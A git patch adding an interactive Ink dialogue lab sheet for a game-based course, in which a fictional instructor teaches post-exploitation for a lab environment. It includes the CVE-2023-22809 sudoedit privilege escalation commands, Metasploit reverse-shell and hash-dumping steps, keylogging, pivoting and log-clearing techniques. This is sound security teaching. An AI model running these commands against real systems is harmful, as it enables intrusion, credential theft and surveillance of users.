From 1a0539d432583bf4e039f1852223f54c10553706 Mon Sep 17 00:00:00 2001 From: "Z. Cliffe Schreuders" Date: Wed, 19 Nov 2025 18:24:26 +0000 Subject: [PATCH] feat: Add GBL post-exploitation techniques lab sheet --- .../ink/lab_sheets/post_exploitation.ink | 906 ++++++++++++++++++ 1 file changed, 906 insertions(+) create mode 100644 story_design/ink/lab_sheets/post_exploitation.ink diff --git a/story_design/ink/lab_sheets/post_exploitation.ink b/story_design/ink/lab_sheets/post_exploitation.ink new file mode 100644 index 0000000..93b1fa1 --- /dev/null +++ b/story_design/ink/lab_sheets/post_exploitation.ink @@ -0,0 +1,906 @@ +// Post-exploitation Lab Sheet +// Based on HacktivityLabSheets: introducing_attacks/7_post-exploitation.md +// Author: Z. Cliffe Schreuders, Anatoliy Gorbenko, Thalita Vergilio +// License: CC BY-SA 4.0 + +// Global persistent state +VAR instructor_rapport = 0 +VAR post_exploit_mastery = 0 + +// External variables +EXTERNAL player_name + +=== start === +Advanced Tactics Instructor: Welcome, Agent {player_name}. I'm your instructor for Post-Exploitation Techniques. + +~ instructor_rapport = 0 +~ post_exploit_mastery = 0 + +Advanced Tactics Instructor: Post-exploitation is what happens after you gain initial access. It's about leveraging that foothold to gather information, escalate privileges, and achieve your objectives. + +Advanced Tactics Instructor: Once an attacker has compromised a system, they can misuse the privileges they've appropriated to take further actions - or go on to compromise other connected systems. + +Advanced Tactics Instructor: This lab completes the attack lifecycle - from initial exploitation through privilege escalation, information gathering, and pivoting to other systems. + +Advanced Tactics Instructor: Remember: these are powerful techniques for authorized penetration testing and defensive security only. + +~ post_exploit_mastery += 10 + +-> post_exploit_hub + +=== post_exploit_hub === +Advanced Tactics Instructor: What aspect of post-exploitation would you like to explore? + ++ [What is post-exploitation?] + -> post_exploit_intro ++ [Understanding shell access] + -> shell_access ++ [Assessing your level of access] + -> assessing_access ++ [Post-exploitation information gathering] + -> info_gathering ++ [Privilege escalation techniques] + -> privilege_escalation ++ [Using the sudo vulnerability (CVE-2023-22809)] + -> sudo_vulnerability ++ [Metasploit post-exploitation modules] + -> msf_post_modules ++ [Introduction to Meterpreter] + -> meterpreter_intro ++ [Meterpreter spyware features] + -> meterpreter_spyware ++ [Pivoting and port forwarding] + -> pivoting ++ [Maintaining access and covering tracks] + -> persistence_evasion ++ [Show me the commands reference] + -> commands_reference ++ [Practical challenge tips] + -> challenge_tips ++ [I'm ready for the lab exercises] + -> ready_for_practice ++ [That's all for now] + #exit_conversation + -> END + +=== post_exploit_intro === +Advanced Tactics Instructor: Post-exploitation is everything that happens after you successfully compromise a system. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: The initial exploit gives you a foothold - usually limited access as whatever user account the vulnerable software was running as. + +Advanced Tactics Instructor: From there, you need to: +understand what level of access you have, gather information about the system, escalate privileges if possible, collect sensitive data, maintain access, and potentially pivot to other systems. + ++ [Why not just stop after getting shell access?] + Advanced Tactics Instructor: Initial access is often limited. You might be running as a low-privilege user, not an administrator. + + Advanced Tactics Instructor: You need to understand the system, find sensitive data, escalate to higher privileges, and ensure you can maintain access. + + Advanced Tactics Instructor: In a real penetration test, you're demonstrating impact - showing what an attacker could actually DO with that access. + + Advanced Tactics Instructor: That means accessing sensitive files, dumping credentials, and potentially moving laterally to other systems. + + ~ instructor_rapport += 5 + ++ [What determines what you can do post-exploitation?] + Advanced Tactics Instructor: Several factors determine your capabilities: + + Advanced Tactics Instructor: First, the type of payload you used. A simple shell gives you command execution. Meterpreter gives you advanced features. + + Advanced Tactics Instructor: Second, the security context - what user account is the vulnerable software running as? + + Advanced Tactics Instructor: Third, the access controls in place. Are there additional restrictions beyond standard user permissions? + + Advanced Tactics Instructor: Finally, your skill at the command line and understanding of the operating system. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== shell_access === +Advanced Tactics Instructor: Shell access means you have access to a command line interface on the target system. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: On Windows, this is typically a Command Prompt or PowerShell. On Unix/Linux systems, it's usually a Bash shell. + +Advanced Tactics Instructor: Sometimes you'll see a familiar prompt. Other times you won't see any prompt at all, but you can still type commands and see output. + ++ [What can I do with shell access?] + Advanced Tactics Instructor: With shell access, you can run almost any command-line program available on the system. + + Advanced Tactics Instructor: You can list files, read documents, run scripts, check system information, create new files, and much more. + + Advanced Tactics Instructor: However, you're limited by the permissions of whatever user account you're running as. + + Advanced Tactics Instructor: If you're a normal user, you can't access administrator-only files or install system-wide software. + + ~ instructor_rapport += 5 + ++ [What commands should I avoid?] + Advanced Tactics Instructor: Avoid interactive programs that expect keyboard input and draw to the screen. + + Advanced Tactics Instructor: For example, on Linux use "cat" instead of "less", because less expects you to scroll and press 'q' to quit. + + Advanced Tactics Instructor: Avoid programs that run continuously until stopped, like "ping" without a count limit. + + Advanced Tactics Instructor: Also be careful with Ctrl-C - it will likely kill your shell connection rather than just the current command. + + ~ instructor_rapport += 5 + ++ [What's the difference between shells on Windows and Linux?] + Advanced Tactics Instructor: Windows shells typically use backslashes in paths (C:\\Users\\), while Linux uses forward slashes (/home/). + + Advanced Tactics Instructor: Common Windows commands: dir, type, net user, whoami, ipconfig + + Advanced Tactics Instructor: Common Linux commands: ls, cat, whoami, id, ifconfig (or ip a) + + Advanced Tactics Instructor: The privilege model is different too - Windows has Administrator/System, Linux has root (UID 0). + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== assessing_access === +Advanced Tactics Instructor: The first question after exploitation is: what level of access do I have? + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: You need to determine what user account you're running as and what privileges that account has. + +Advanced Tactics Instructor: On Windows, you might have Administrator, System, or a regular user account. On Linux, you want to know if you're root (UID 0) or a normal user. + ++ [How do I check my access level on Linux?] + Advanced Tactics Instructor: Use these commands to assess your Linux access: + + Advanced Tactics Instructor: whoami - Shows your username + + Advanced Tactics Instructor: id - Shows your user ID (UID), group ID (GID), and groups + + Advanced Tactics Instructor: id -u - Shows just the UID. A UID of 0 means you're root! + + Advanced Tactics Instructor: Any other UID means you're a normal user with standard access controls applying. + + ~ instructor_rapport += 5 + ++ [How do I check my access level on Windows?] + Advanced Tactics Instructor: On Windows, you can use: + + Advanced Tactics Instructor: whoami - Shows your username and domain + + Advanced Tactics Instructor: whoami /priv - Shows your privileges + + Advanced Tactics Instructor: net user USERNAME - Shows details about a user account + + Advanced Tactics Instructor: If you have Meterpreter: getuid and getprivs give detailed privilege information. + + ~ instructor_rapport += 5 + ++ [What if I don't have root or Administrator access?] + Advanced Tactics Instructor: That's very common! Most services run as unprivileged users for security reasons. + + Advanced Tactics Instructor: You can still access files that user can read, which might include sensitive data. + + Advanced Tactics Instructor: You can gather system information to look for privilege escalation opportunities. + + Advanced Tactics Instructor: On Linux, try accessing /etc/shadow - if you can't, that confirms you're not root. + + Advanced Tactics Instructor: Then you'll want to look for privilege escalation vulnerabilities. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== info_gathering === +Advanced Tactics Instructor: Information gathering continues even after exploitation. Understanding the system helps you plan your next moves. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: You want to learn about the operating system, installed software, network configuration, running processes, and other users. + ++ [What system information should I gather on Linux?] + Advanced Tactics Instructor: Key commands for Linux information gathering: + + Advanced Tactics Instructor: uname -a (kernel version and architecture) + + Advanced Tactics Instructor: cat /proc/cpuinfo (CPU details) + + Advanced Tactics Instructor: free -h (memory usage) + + Advanced Tactics Instructor: df -h (disk usage and partitions) + + Advanced Tactics Instructor: env (environment variables) + + Advanced Tactics Instructor: cat /etc/passwd (list of user accounts) + + Advanced Tactics Instructor: This information helps you understand the target and identify potential attack vectors. + + ~ instructor_rapport += 5 + ++ [Why check the sudo version?] + Advanced Tactics Instructor: The sudo command allows users to run commands with elevated privileges. + + Advanced Tactics Instructor: Check the version with: sudo --version + + Advanced Tactics Instructor: Certain versions of sudo have critical security vulnerabilities that allow privilege escalation! + + Advanced Tactics Instructor: For example, CVE-2023-22809 affects sudo versions 1.8.0 through 1.9.12p1. + + Advanced Tactics Instructor: Finding a vulnerable sudo version is a goldmine for privilege escalation. + + ~ instructor_rapport += 5 + ++ [What network information is useful?] + Advanced Tactics Instructor: Network information reveals what other systems you might be able to reach: + + Advanced Tactics Instructor: ifconfig or ip a (network interfaces and IP addresses) + + Advanced Tactics Instructor: netstat -an or ss -an (active connections and listening ports) + + Advanced Tactics Instructor: route or ip route (routing table) + + Advanced Tactics Instructor: cat /etc/resolv.conf (DNS configuration) + + Advanced Tactics Instructor: This helps you identify other systems to pivot to or internal networks to explore. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== privilege_escalation === +Advanced Tactics Instructor: Privilege escalation means gaining additional privileges you weren't intentionally granted. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: Vertical privilege escalation is going from normal user to administrator/root. Horizontal privilege escalation is accessing resources of another user at the same privilege level. + +Advanced Tactics Instructor: Privilege escalation exploits vulnerabilities in the kernel, system software, or misconfigurations. + ++ [What are common privilege escalation vectors?] + Advanced Tactics Instructor: Common privilege escalation opportunities include: + + Advanced Tactics Instructor: Vulnerable kernel versions with known local exploits + + Advanced Tactics Instructor: Vulnerable system software like sudo, polkit, or services + + Advanced Tactics Instructor: Misconfigured SUID binaries on Linux + + Advanced Tactics Instructor: Weak file permissions on sensitive files + + Advanced Tactics Instructor: Scheduled tasks running as administrators + + Advanced Tactics Instructor: Credentials stored in plaintext or easily crackable formats + + ~ instructor_rapport += 5 + ++ [How do I find privilege escalation opportunities?] + Advanced Tactics Instructor: Systematic enumeration is key: + + Advanced Tactics Instructor: Check kernel and software versions against CVE databases + + Advanced Tactics Instructor: Look for SUID binaries: find / -perm -4000 2>/dev/null + + Advanced Tactics Instructor: Check sudo permissions: sudo -l + + Advanced Tactics Instructor: Look for world-writable files in sensitive directories + + Advanced Tactics Instructor: Check for credentials in config files, bash history, and environment variables + + ~ instructor_rapport += 5 + ++ [Tell me about the sudo vulnerability] + -> sudo_vulnerability + +- -> post_exploit_hub + +=== sudo_vulnerability === +Advanced Tactics Instructor: CVE-2023-22809 is a critical sudo vulnerability affecting versions 1.8.0 through 1.9.12p1. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: The vulnerability is in sudoedit, which allows editing files with elevated privileges. + +Advanced Tactics Instructor: By manipulating environment variables, you can trick sudoedit into opening files you shouldn't have access to. + ++ [How does this vulnerability work?] + Advanced Tactics Instructor: The vulnerability exploits how sudoedit processes the EDITOR environment variable. + + Advanced Tactics Instructor: Normally, sudoedit restricts which files you can edit. But a coding mistake means you can use "--" to specify additional files. + + Advanced Tactics Instructor: For example: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts + + Advanced Tactics Instructor: This tells sudoedit to use "cat" as the editor and tricks it into opening /etc/shadow with root privileges! + + Advanced Tactics Instructor: The /etc/hosts file is just a decoy to satisfy sudoedit's normal operation. + + ~ instructor_rapport += 5 + ++ [How can I use this to escalate privileges?] + Advanced Tactics Instructor: First, you can read sensitive files: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts + + Advanced Tactics Instructor: This gives you password hashes which you might crack offline. + + Advanced Tactics Instructor: More powerfully, you can edit the sudoers file: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts + + Advanced Tactics Instructor: Add a line like: distccd ALL=(ALL) NOPASSWD:ALL + + Advanced Tactics Instructor: This allows your user to run any command as root without a password: sudo -i + + Advanced Tactics Instructor: Now you're root! + + ~ instructor_rapport += 5 + ++ [What's tricky about exploiting this?] + Advanced Tactics Instructor: The challenge is that your simple shell doesn't support full interactive programs well. + + Advanced Tactics Instructor: When you use vim to edit /etc/sudoers, the display will be distorted and arrow keys won't work properly. + + Advanced Tactics Instructor: You need to carefully use vim commands without visual feedback: +"G" then "o" to go to bottom and insert new line, type your new line, "Esc" then ":x" to save. + + Advanced Tactics Instructor: Be very careful - if you corrupt /etc/sudoers, you'll break the VM! + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== msf_post_modules === +Advanced Tactics Instructor: Metasploit has numerous post-exploitation modules for automated information gathering and attacks. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: These modules run against established sessions to collect data, escalate privileges, or set up persistence. + +Advanced Tactics Instructor: They're categorized by operating system and function: gather, escalate, manage, recon, and more. + ++ [How do I use post-exploitation modules?] + Advanced Tactics Instructor: First, you need an active session. Background it with Ctrl-Z. + + Advanced Tactics Instructor: Check your session ID: sessions + + Advanced Tactics Instructor: Select a post module: use post/linux/gather/checkvm + + Advanced Tactics Instructor: Set the session: setg SESSION 1 (or your session ID) + + Advanced Tactics Instructor: Using "setg" sets it globally, so you don't have to set it for each module. + + Advanced Tactics Instructor: Run the module: exploit (or run) + + ~ instructor_rapport += 5 + ++ [What useful post-exploitation modules exist?] + Advanced Tactics Instructor: For Linux targets, valuable modules include: + + Advanced Tactics Instructor: post/linux/gather/checkvm - Detect if running in a VM + + Advanced Tactics Instructor: post/linux/gather/enum_configs - Download config files + + Advanced Tactics Instructor: post/linux/gather/enum_network - Network configuration + + Advanced Tactics Instructor: post/linux/gather/enum_system - System and software information + + Advanced Tactics Instructor: post/linux/gather/enum_users_history - Command history and logs + + Advanced Tactics Instructor: post/linux/gather/hashdump - Dump password hashes + + ~ instructor_rapport += 5 + ++ [Where does collected information get stored?] + Advanced Tactics Instructor: Post-exploitation modules store collected data as "loot" in Metasploit's database. + + Advanced Tactics Instructor: The module output tells you where files are saved, usually in ~/.msf4/loot/ + + Advanced Tactics Instructor: You can view loot with: loot + + Advanced Tactics Instructor: Files are timestamped and categorized, making it easy to review later for report writing. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== meterpreter_intro === +Advanced Tactics Instructor: Meterpreter is an advanced payload originally developed by Matt Miller (Skape). + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: Unlike a simple shell, Meterpreter provides a sophisticated remote administration framework with many built-in features. + +Advanced Tactics Instructor: It's dynamically extensible - features can be loaded as needed. By default, it encrypts all communications. + ++ [What makes Meterpreter special?] + Advanced Tactics Instructor: Meterpreter has numerous advantages over basic shells: + + Advanced Tactics Instructor: Runs entirely in memory - doesn't write to disk, making forensics harder + + Advanced Tactics Instructor: Encrypted communications by default + + Advanced Tactics Instructor: Rich command set for file browsing, process manipulation, network operations + + Advanced Tactics Instructor: Can migrate between processes to hide or achieve persistence + + Advanced Tactics Instructor: Extensible with post-exploitation modules + + Advanced Tactics Instructor: Includes "spyware" features like keylogging and screen capture + + ~ instructor_rapport += 5 + ++ [How do I use Meterpreter commands?] + Advanced Tactics Instructor: Start by viewing available commands: help + + Advanced Tactics Instructor: Get current privileges: getuid and getprivs + + Advanced Tactics Instructor: Browse files: ls c:/ (Windows) or ls / (Linux) + + Advanced Tactics Instructor: Download files: download /path/to/file + + Advanced Tactics Instructor: Upload files: upload /local/file /remote/file + + Advanced Tactics Instructor: View processes: ps + + Advanced Tactics Instructor: Migrate to another process: migrate PID + + Advanced Tactics Instructor: Drop to a system shell: shell (Ctrl-D to return to Meterpreter) + + ~ instructor_rapport += 5 + ++ [How does Meterpreter avoid detection?] + Advanced Tactics Instructor: Meterpreter is designed for stealth: + + Advanced Tactics Instructor: It stays in memory and doesn't write files to disk (fileless malware) + + Advanced Tactics Instructor: By default it masquerades as "svchost.exe" on Windows, a common legitimate process + + Advanced Tactics Instructor: It can migrate into other running processes, making it hard to identify + + Advanced Tactics Instructor: Communications are encrypted, making network monitoring less effective + + Advanced Tactics Instructor: However, modern endpoint detection systems can still identify Meterpreter through behavioral analysis. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== meterpreter_spyware === +Advanced Tactics Instructor: Meterpreter includes features typically associated with spyware - monitoring user activity without their knowledge. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: These features can capture keystrokes, screenshots, and even webcam feeds. + +Advanced Tactics Instructor: While concerning for privacy, they're useful for security testing to demonstrate the risk of compromise. + ++ [How does keylogging work in Meterpreter?] + Advanced Tactics Instructor: Meterpreter can capture all keystrokes on the target system. + + Advanced Tactics Instructor: In Armitage: Right-click target → Meterpreter → Explore → Log Keystrokes + + Advanced Tactics Instructor: Set CAPTURE_TYPE to "winlogon" to capture login attempts + + Advanced Tactics Instructor: Via command line: keyscan_start (then keyscan_dump to view results) + + Advanced Tactics Instructor: This captures everything typed - passwords, emails, documents, searches. + + ~ instructor_rapport += 5 + ++ [How do I capture screenshots?] + Advanced Tactics Instructor: Screenshots show what the user is viewing: + + Advanced Tactics Instructor: screenshot - Captures current screen + + Advanced Tactics Instructor: The image is downloaded to your Kali system and automatically opened + + Advanced Tactics Instructor: This can reveal sensitive documents, credentials, or user behavior + + Advanced Tactics Instructor: In Armitage, there are menu options for screen capture in the Meterpreter menu. + + ~ instructor_rapport += 5 + ++ [Can I get full graphical control?] + Advanced Tactics Instructor: Yes! You can use VNC for full graphical remote control: + + Advanced Tactics Instructor: In Armitage: Right-click target → Meterpreter → Interact → Desktop (VNC) + + Advanced Tactics Instructor: Armitage starts a VNC server on the target and tells you the port + + Advanced Tactics Instructor: Connect with: vncviewer 127.0.0.1:PORT + + Advanced Tactics Instructor: You'll see and control the target's desktop just like sitting at their keyboard! + + Advanced Tactics Instructor: This is powerful but obvious to any user who's watching their screen. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== pivoting === +Advanced Tactics Instructor: Pivoting means using a compromised system as a stepping stone to attack other systems. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: Often attackers can't directly reach internal systems - firewalls, NAT, and network segmentation block direct access. + +Advanced Tactics Instructor: But if you compromise a system that CAN reach those internal systems, you can route your attacks through it. + ++ [Why would I need to pivot?] + Advanced Tactics Instructor: Several scenarios require pivoting: + + Advanced Tactics Instructor: Attacking internal systems from a compromised public-facing server + + Advanced Tactics Instructor: Accessing networks behind firewalls or NAT + + Advanced Tactics Instructor: Moving laterally through a corporate network + + Advanced Tactics Instructor: Hiding your true origin by routing through multiple compromised hosts + + Advanced Tactics Instructor: In real penetration tests, you often start from a DMZ server and need to pivot to reach critical internal systems. + + ~ instructor_rapport += 5 + ++ [How does Meterpreter pivoting work?] + Advanced Tactics Instructor: Meterpreter can set up routing so all your attacks go through a compromised host. + + Advanced Tactics Instructor: In Armitage: Right-click compromised host → Meterpreter → Pivoting → Setup → Add Pivot + + Advanced Tactics Instructor: Via command line, you use the "route" command in msfconsole + + Advanced Tactics Instructor: Once configured, any Metasploit attacks you launch will be routed through that system + + Advanced Tactics Instructor: The pivoted attacks will appear to come from the compromised system, not your Kali VM. + + ~ instructor_rapport += 5 + ++ [What's port forwarding?] + Advanced Tactics Instructor: Port forwarding is a simpler form of pivoting. + + Advanced Tactics Instructor: You instruct a compromised system to listen on a port and forward connections to a different host and port. + + Advanced Tactics Instructor: For example, forward local port 8080 to an internal web server on 10.0.0.5:80 + + Advanced Tactics Instructor: This makes the internal service accessible through the compromised system. + + Advanced Tactics Instructor: Meterpreter's portfwd command handles this: portfwd add -l 8080 -p 80 -r 10.0.0.5 + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== persistence_evasion === +Advanced Tactics Instructor: Maintaining access and covering tracks are advanced post-exploitation techniques. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: Persistence means ensuring you can regain access even if the system reboots or the service is restarted. + +Advanced Tactics Instructor: Covering tracks means removing evidence of the attack from logs and the filesystem. + ++ [How do attackers maintain access?] + Advanced Tactics Instructor: Common persistence mechanisms include: + + Advanced Tactics Instructor: Creating new user accounts with administrative privileges + + Advanced Tactics Instructor: Installing backdoors that run on boot (services, scheduled tasks, startup scripts) + + Advanced Tactics Instructor: Modifying SSH authorized_keys to allow your key + + Advanced Tactics Instructor: Installing rootkits that hide processes and files + + Advanced Tactics Instructor: Meterpreter has post-exploitation modules specifically for persistence. + + ~ instructor_rapport += 5 + ++ [How do you cover your tracks?] + Advanced Tactics Instructor: Covering tracks involves removing or modifying evidence: + + Advanced Tactics Instructor: Clearing log files (on Linux: /var/log/auth.log, /var/log/syslog, etc.) + + Advanced Tactics Instructor: Clearing command history (bash history, PowerShell history) + + Advanced Tactics Instructor: Removing uploaded tools and malware + + Advanced Tactics Instructor: Modifying file timestamps to match surrounding files + + Advanced Tactics Instructor: However, sophisticated forensics can often detect these modifications. + + ~ instructor_rapport += 5 + ++ [Does Meterpreter have anti-forensics features?] + Advanced Tactics Instructor: Yes, Meterpreter is designed with anti-forensics in mind: + + Advanced Tactics Instructor: It runs in memory without writing to disk (fileless) + + Advanced Tactics Instructor: It can migrate between processes, making it hard to find + + Advanced Tactics Instructor: Communications are encrypted + + Advanced Tactics Instructor: There are modules to clear event logs: clearev + + Advanced Tactics Instructor: However, modern endpoint detection and response (EDR) tools can detect Meterpreter through behavioral analysis. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== commands_reference === +Advanced Tactics Instructor: Let me provide a comprehensive post-exploitation commands reference. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: **Initial Exploitation (Distcc example):** + +Advanced Tactics Instructor: nmap -p 1-65535 TARGET (scan all ports) + +Advanced Tactics Instructor: msfconsole + +Advanced Tactics Instructor: search distccd + +Advanced Tactics Instructor: use exploit/unix/misc/distcc_exec + +Advanced Tactics Instructor: set RHOST TARGET_IP + +Advanced Tactics Instructor: set PAYLOAD cmd/unix/reverse + +Advanced Tactics Instructor: set LHOST YOUR_IP + +Advanced Tactics Instructor: exploit + ++ [Show me access assessment commands] + Advanced Tactics Instructor: **Assessing Access Level:** + + Advanced Tactics Instructor: whoami (show username) + + Advanced Tactics Instructor: id (show UID, GID, groups) + + Advanced Tactics Instructor: id -u (show just UID - 0 means root) + + Advanced Tactics Instructor: cat /etc/shadow (try to read - if fails, not root) + + ~ instructor_rapport += 3 + ++ [Show me information gathering commands] + Advanced Tactics Instructor: **Information Gathering (Linux):** + + Advanced Tactics Instructor: env (environment variables) + + Advanced Tactics Instructor: uname -a (kernel version) + + Advanced Tactics Instructor: cat /proc/cpuinfo (CPU info) + + Advanced Tactics Instructor: free -h (memory) + + Advanced Tactics Instructor: df -h (disk space) + + Advanced Tactics Instructor: cat /etc/passwd (user accounts) + + Advanced Tactics Instructor: sudo --version (check for vulnerable sudo) + + Advanced Tactics Instructor: ifconfig or ip a (network interfaces) + + ~ instructor_rapport += 3 + ++ [Show me privilege escalation commands] + Advanced Tactics Instructor: **Privilege Escalation (CVE-2023-22809):** + + Advanced Tactics Instructor: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts + + Advanced Tactics Instructor: (View password hashes) + + Advanced Tactics Instructor: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts + + Advanced Tactics Instructor: (Edit sudoers file - be very careful!) + + Advanced Tactics Instructor: In vim: Press Enter, type "Go", press Enter, type "distccd ALL=(ALL) NOPASSWD:ALL" + + Advanced Tactics Instructor: Press Esc, type ":x", press Enter, press Esc, type ":q!", press Enter + + Advanced Tactics Instructor: sudo -i (escalate to root) + + ~ instructor_rapport += 3 + ++ [Show me Linux admin commands] + Advanced Tactics Instructor: **Linux Post-Exploitation:** + + Advanced Tactics Instructor: useradd USERNAME (create user) + + Advanced Tactics Instructor: passwd USERNAME (set password) + + Advanced Tactics Instructor: cat /etc/passwd (list users) + + Advanced Tactics Instructor: sh (spawn command interpreter) + + ~ instructor_rapport += 3 + ++ [Show me Metasploit post modules] + Advanced Tactics Instructor: **Metasploit Post-Exploitation:** + + Advanced Tactics Instructor: Ctrl-Z (background session) + + Advanced Tactics Instructor: sessions (list sessions) + + Advanced Tactics Instructor: use post/linux/gather/checkvm + + Advanced Tactics Instructor: setg SESSION 1 + + Advanced Tactics Instructor: exploit + + Advanced Tactics Instructor: **Useful Post Modules:** + + Advanced Tactics Instructor: post/linux/gather/enum_configs + + Advanced Tactics Instructor: post/linux/gather/enum_network + + Advanced Tactics Instructor: post/linux/gather/enum_system + + Advanced Tactics Instructor: post/linux/gather/enum_users_history + + Advanced Tactics Instructor: post/linux/gather/hashdump + + ~ instructor_rapport += 3 + ++ [Show me Meterpreter commands] + Advanced Tactics Instructor: **Meterpreter Commands:** + + Advanced Tactics Instructor: help (list all commands) + + Advanced Tactics Instructor: getuid (current user) + + Advanced Tactics Instructor: getprivs (privileges) + + Advanced Tactics Instructor: ls c:/ (browse files) + + Advanced Tactics Instructor: download FILE (download file) + + Advanced Tactics Instructor: upload LOCAL REMOTE (upload file) + + Advanced Tactics Instructor: ps (list processes) + + Advanced Tactics Instructor: migrate PID (migrate to process) + + Advanced Tactics Instructor: shell (drop to system shell, Ctrl-D to return) + + Advanced Tactics Instructor: run post/windows/gather/hashdump (dump hashes) + + Advanced Tactics Instructor: screenshot (capture screen) + + Advanced Tactics Instructor: keyscan_start / keyscan_dump (keylogging) + + ~ instructor_rapport += 3 + ++ [Show me Armitage commands] + Advanced Tactics Instructor: **Armitage Setup:** + + Advanced Tactics Instructor: sudo msfdb reinit + + Advanced Tactics Instructor: sudo armitage & + + Advanced Tactics Instructor: **Armitage Workflow:** + + Advanced Tactics Instructor: Hosts → Add Host → enter IP + + Advanced Tactics Instructor: Right-click host → Scan + + Advanced Tactics Instructor: Drag exploit onto target icon → Launch + + Advanced Tactics Instructor: Right-click compromised host → Meterpreter → Interact + + Advanced Tactics Instructor: **Pivoting:** + + Advanced Tactics Instructor: Right-click → Meterpreter → Pivoting → Setup → Add Pivot + + ~ instructor_rapport += 3 + +- -> post_exploit_hub + +=== challenge_tips === +Advanced Tactics Instructor: Let me give you practical tips for the post-exploitation challenges. + +~ instructor_rapport += 5 + +Advanced Tactics Instructor: **Exploiting Distcc:** + +Advanced Tactics Instructor: Scan all ports to find distcc: nmap -p- TARGET + +Advanced Tactics Instructor: Use exploit/unix/misc/distcc_exec with cmd/unix/reverse payload + +Advanced Tactics Instructor: You'll get a shell as the distccd user, not root. + ++ [Tips for privilege escalation?] + Advanced Tactics Instructor: Check the sudo version immediately: sudo --version + + Advanced Tactics Instructor: If it's vulnerable (1.8.0-1.9.12p1), use the CVE-2023-22809 exploit. + + Advanced Tactics Instructor: When editing /etc/sudoers with vim, follow the commands EXACTLY - one wrong keystroke can break the VM. + + Advanced Tactics Instructor: After editing sudoers, run: sudo -i to become root. + + Advanced Tactics Instructor: Verify with: id -u (should show 0) + + ~ instructor_rapport += 5 + ++ [Tips for using post-exploitation modules?] + Advanced Tactics Instructor: Always background your session first with Ctrl-Z + + Advanced Tactics Instructor: Use "setg SESSION ID" to set the session globally for all modules. + + Advanced Tactics Instructor: Run multiple enum modules to gather comprehensive information. + + Advanced Tactics Instructor: The output tells you where loot is stored - check those files! + + Advanced Tactics Instructor: Not all modules work perfectly - if one fails, move on to others. + + ~ instructor_rapport += 5 + ++ [Tips for using Meterpreter and Armitage?] + Advanced Tactics Instructor: Exploit the Windows server with easyftp to get a Meterpreter session. + + Advanced Tactics Instructor: Use getuid and getprivs to understand your privileges immediately. + + Advanced Tactics Instructor: Browse to user desktops to find flags: ls C:\\Users\\ + + Advanced Tactics Instructor: Try both Meterpreter commands and Armitage's GUI features. + + Advanced Tactics Instructor: If Meterpreter becomes unresponsive, restart the Windows VM and re-exploit. + + ~ instructor_rapport += 5 + ++ [Tips for pivoting?] + Advanced Tactics Instructor: Set up a pivot through the Windows system to attack Linux. + + Advanced Tactics Instructor: In Armitage: Right-click Windows → Meterpreter → Pivoting → Setup → Add Pivot + + Advanced Tactics Instructor: Add the Linux target: Hosts → Add Hosts → enter Linux IP + + Advanced Tactics Instructor: Scan and exploit through the pivot - it will be slower but will work. + + Advanced Tactics Instructor: The Armitage interface shows the routing path visually. + + ~ instructor_rapport += 5 + ++ [Where are the flags?] + Advanced Tactics Instructor: Linux flags are in user home directories under /home/ + + Advanced Tactics Instructor: Use find /home -name "*flag*" to search for them. + + Advanced Tactics Instructor: Windows flags are on user Desktops: C:\\Users\\USERNAME\\Desktop\\ + + Advanced Tactics Instructor: One Linux challenge involves cracking a protected.zip file. + + Advanced Tactics Instructor: You'll need to dump password hashes and crack them to get the zip password. + + ~ instructor_rapport += 5 + +- -> post_exploit_hub + +=== ready_for_practice === +Advanced Tactics Instructor: Excellent! You're ready for advanced post-exploitation techniques. + +~ instructor_rapport += 10 +~ post_exploit_mastery += 10 + +Advanced Tactics Instructor: This lab completes your understanding of the full attack lifecycle - from initial reconnaissance through exploitation to post-exploitation. + +Advanced Tactics Instructor: You'll exploit systems, escalate privileges, gather sensitive data, and pivot through networks. + +Advanced Tactics Instructor: Remember: these techniques are powerful and potentially destructive. Use them only for authorized penetration testing and defensive security. + ++ [Any final advice?] + Advanced Tactics Instructor: Work methodically. After each exploitation, assess your access, gather information, then escalate privileges. + + Advanced Tactics Instructor: Take careful notes of what you find - credentials, software versions, vulnerable services. + + Advanced Tactics Instructor: When using the sudo privilege escalation, follow the vim commands EXACTLY. Practice on a non-critical system first if you're nervous. + + Advanced Tactics Instructor: Explore both Meterpreter commands and Armitage's interface to see which you prefer. + + Advanced Tactics Instructor: Don't get frustrated if something doesn't work - exploit reliability varies. Try restarting VMs and trying again. + + Advanced Tactics Instructor: Most importantly: understand WHY each technique works, not just HOW to execute it. + + Advanced Tactics Instructor: Good luck, Agent {player_name}. This is where you demonstrate the full impact of system compromise. + + ~ instructor_rapport += 10 + +- -> post_exploit_hub + +-> END